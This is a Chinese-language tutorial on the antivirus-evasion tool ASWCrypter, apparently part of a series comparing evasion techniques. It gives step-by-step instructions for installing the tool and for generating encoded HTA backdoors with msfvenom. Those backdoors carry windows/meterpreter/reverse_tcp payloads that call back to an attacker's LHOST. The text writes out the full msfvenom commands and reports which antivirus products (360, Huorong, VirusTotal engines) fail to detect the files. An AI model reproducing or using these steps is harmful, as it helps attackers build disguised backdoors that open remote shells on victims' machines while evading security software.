免殺能力一覽表

幾點說明：

1、上表中標識 √ 說明相應殺毒軟件未檢測出病毒，也就是代表了Bypass。

2、為了更好的對比效果，大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。

3、由于本機測試時只是安裝了360全家桶和火絨，所以默認情況下360和火絨殺毒情況指的是靜態+動態查殺。360殺毒版本5.0.0.8160(2020.01.01)，火絨版本5.0.34.16(2020.01.01)，360安全衛士12.0.0.2002(2020.01.01)。

4、其他殺軟的檢測指標是在virustotal.com（簡稱VT）上在線查殺，所以可能只是代表了靜態查殺能力，數據僅供參考，不足以作為免殺或殺軟查殺能力的判斷指標。

5、完全不必要苛求一種免殺技術能bypass所有殺軟，這樣的技術肯定是有的，只是沒被公開，一旦公開第二天就能被殺了，其實我們只要能bypass目標主機上的殺軟就足夠了。

一、ASWCrypter介紹

ASWCrypter是2018年開源的免殺工具，原理比較簡單，使用msf生成hta代碼，然后使用python腳本對hta代碼進行一定編碼處理，生成新的hta后門文件，從而達到免殺效果。

二、安裝ASWCrypter

需要本機安裝metasploit和python環境。

ASWCrypter的安裝比較簡單,先git clone到本地

git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git

進入ASWCrypter目錄，執行chmod +x ./ASWCrypter.sh。

執行./ASWCrypter.sh即可運行ASWCrypter。

三、ASWCrypter使用說明

使用時需要注意的只有一點，就是要在linux桌面環境中運行，因為在ASWCrypter.sh腳本中，調用msfvenom生成后門時使用了xterm。

xterm -T "SHELLCODE GENERATOR(ASWCrypter)" -geometry 100x50 -e "msfvenom -p $paylo LHOST=$lhost LPORT=$lport -i 43 -f hta-psh > $getPATH/output/chars.raw"

四、利用ASWCrypter生成后門

執行./ASWCrypter.sh，選擇G，第一步也只有這個能選

然后輸入LHOST和LPORT

后門選擇payload,我還是選擇最常規的reverse_tcp了,文件名就隨便輸一個了

之后提示生成test4.hta成功，后面會提示是否開啟msf監聽，我這就不需要了，還是在mac上監聽端口。

不開殺軟的時候可正常上線

打開殺軟，火絨靜態和動態都能查殺，360動態+靜態都沒報警。

試了下msfvenom生成的原始的hta文件的查殺率

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f hta-psh -o test5.hta

virustotal.com上查殺率為28/56

五、ASWCrypter小結

ASWCrypter是使用msfvenom生成基于powershell的hta后門文件，然后進行編碼處理，達到一定的免殺效果，不過因為會調用powershell，行為檢測還是很容易被檢測出來。

六、參考資料

官方Github:https://github.com/abedalqaderswedan1/aswcrypter